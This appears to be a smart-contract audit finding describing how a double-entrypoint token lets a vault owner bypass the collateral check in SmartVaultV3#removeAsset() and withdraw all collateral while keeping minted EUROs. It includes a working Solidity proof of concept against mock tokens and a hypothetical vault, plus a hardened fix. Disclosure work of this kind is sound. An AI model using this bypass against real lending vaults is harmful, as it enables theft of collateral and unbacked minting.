If the accepted collateral is a double-entrypoint token, an attacker can bypass the collateral check in SmartVaultV3#removeAsset() and withdraw all of the collateral
SmartVaultV3#removeAsset() lets the vault owner withdraw assets:

```solidity
function removeAsset(address _tokenAddr, uint256 _amount, address _to) external onlyOwner {
    // Looks the address up in the TokenManager's accepted-token list.
    ITokenManager.Token memory token = getTokenManager().getTokenIfExists(_tokenAddr);
    // The collateral check only runs when the lookup matched the address passed in. <----
    if (token.addr == _tokenAddr) require(canRemoveCollateral(token, _amount), UNDER_COLL);
    // The transfer is executed against whatever address was passed in, matched or not.
    IERC20(_tokenAddr).safeTransfer(_to, _amount);
    emit AssetRemoved(_tokenAddr, _amount, _to);
}
```
If a token is on the accepted list, meaning it may be used as collateral in the vault, a withdrawal of it must pass the canRemoveCollateral() check. The problem arises when the collateral is a double-entrypoint token. This type of token has two separate addresses that interact with the same underlying balance, which is what caused the vulnerability when such a token was integrated into Compound. getTokenIfExists() only recognises the address registered in the TokenManager, so calling removeAsset() with the token's second address yields token.addr != _tokenAddr, the check is skipped, and safeTransfer() through the second address moves the same collateral out of the vault. An attacker can therefore deposit this token into a vault, mint EUROs against it, and then withdraw all of the collateral.
The attacker can mint as many EUROs as they want without any collateral backing them.
Manual review
When withdrawing assets, the balance of every accepted token should be checked after the transfer, rather than only the token whose registered address matches the one passed in.
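The following is an added, self-contained Solidity reproduction of the bypass described above together with the recommended fix; it is not code from the protocol. It assumes a constructed double-entrypoint token (Canonical plus a forwarding Legacy address), a hypothetical Vault that prices one accepted token 1:1 against the minted stablecoin at 110% collateralisation, and a tokenIfExists() helper standing in for TokenManager.getTokenIfExists(). The unhardened path keeps the shape of the reported check; the hardened path transfers first and then re-checks the balance of every accepted token.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

// Constructed mock of a double-entrypoint token. Canonical holds the balances; Legacy is a
// second address that forwards to it, so both addresses move the same balance
// (a simplified version of the TUSD legacy-address pattern).
contract Canonical is IERC20 {
    mapping(address => uint256) public override balanceOf;
    address public legacy;
    constructor(address holder) { balanceOf[holder] = 1_000e18; }
    function setLegacy(address l) external { legacy = l; }
    function transfer(address to, uint256 amount) external override returns (bool) {
        return _move(msg.sender, to, amount);
    }
    // Only the legacy entry point may move tokens on behalf of another account.
    function legacyTransfer(address from, address to, uint256 amount) external returns (bool) {
        require(msg.sender == legacy, "not legacy");
        return _move(from, to, amount);
    }
    function _move(address from, address to, uint256 amount) internal returns (bool) {
        require(balanceOf[from] >= amount, "balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

contract Legacy is IERC20 {
    Canonical immutable canonical;
    constructor(Canonical c) { canonical = c; }
    function balanceOf(address who) external view override returns (uint256) { return canonical.balanceOf(who); }
    function transfer(address to, uint256 amount) external override returns (bool) {
        return canonical.legacyTransfer(msg.sender, to, amount);
    }
}

// Hypothetical vault (not SmartVaultV3): one accepted token valued 1:1, 110% minimum collateral.
contract Vault {
    address[] public accepted;   // stands in for the TokenManager's accepted-token list
    uint256 public minted;       // stablecoin minted against the collateral
    uint256 constant RATE = 110;
    bool immutable hardened;
    constructor(address token, bool _hardened) { accepted.push(token); hardened = _hardened; }

    // Models getTokenIfExists(): the registered address, or address(0) for anything else.
    function tokenIfExists(address t) internal view returns (address) {
        for (uint256 i; i < accepted.length; i++) if (accepted[i] == t) return t;
        return address(0);
    }
    function collateralValue() public view returns (uint256 value) {
        for (uint256 i; i < accepted.length; i++) value += IERC20(accepted[i]).balanceOf(address(this));
    }
    function fullyCollateralised() public view returns (bool) {
        return collateralValue() * 100 >= minted * RATE;
    }
    function mint(uint256 amount) external {
        minted += amount;
        require(fullyCollateralised(), "under-coll");
    }
    function removeAsset(address _tokenAddr, uint256 _amount, address _to) external {
        if (!hardened) {
            // Same shape as the reported code: the check runs only for the registered address.
            if (tokenIfExists(_tokenAddr) == _tokenAddr)
                require((collateralValue() - _amount) * 100 >= minted * RATE, "under-coll");
            IERC20(_tokenAddr).transfer(_to, _amount);
        } else {
            // Fix: transfer first, then re-check the balance of every accepted token.
            IERC20(_tokenAddr).transfer(_to, _amount);
            require(fullyCollateralised(), "under-coll");
        }
    }
}

// Runs the attack against both vault variants; the caller of run() owns the tokens and vaults.
contract Poc {
    function run() external returns (bool drained, bool blocked) {
        Canonical canon = new Canonical(address(this));
        Legacy legacy = new Legacy(canon);
        canon.setLegacy(address(legacy));

        Vault vuln = new Vault(address(canon), false);
        canon.transfer(address(vuln), 100e18);
        vuln.mint(90e18);
        // Withdrawing through the second address: lookup fails, check skipped, collateral leaves.
        vuln.removeAsset(address(legacy), 100e18, address(this));
        drained = canon.balanceOf(address(vuln)) == 0 && vuln.minted() == 90e18;

        Vault safe = new Vault(address(canon), true);
        canon.transfer(address(safe), 100e18);
        safe.mint(90e18);
        (bool ok, ) = address(safe).call(
            abi.encodeCall(safe.removeAsset, (address(legacy), 100e18, address(this)))
        );
        blocked = !ok;   // post-transfer balance check reverts the whole withdrawal
    }
}
```

Deploy Poc and call run(): it returns (true, true), i.e. the vault with the original check shape is drained while still owing 90e18 of minted stablecoin, and the hardened vault reverts the same call. Note that the fix re-reads balanceOf() on the registered address, so it holds no matter which entry point the transfer went through.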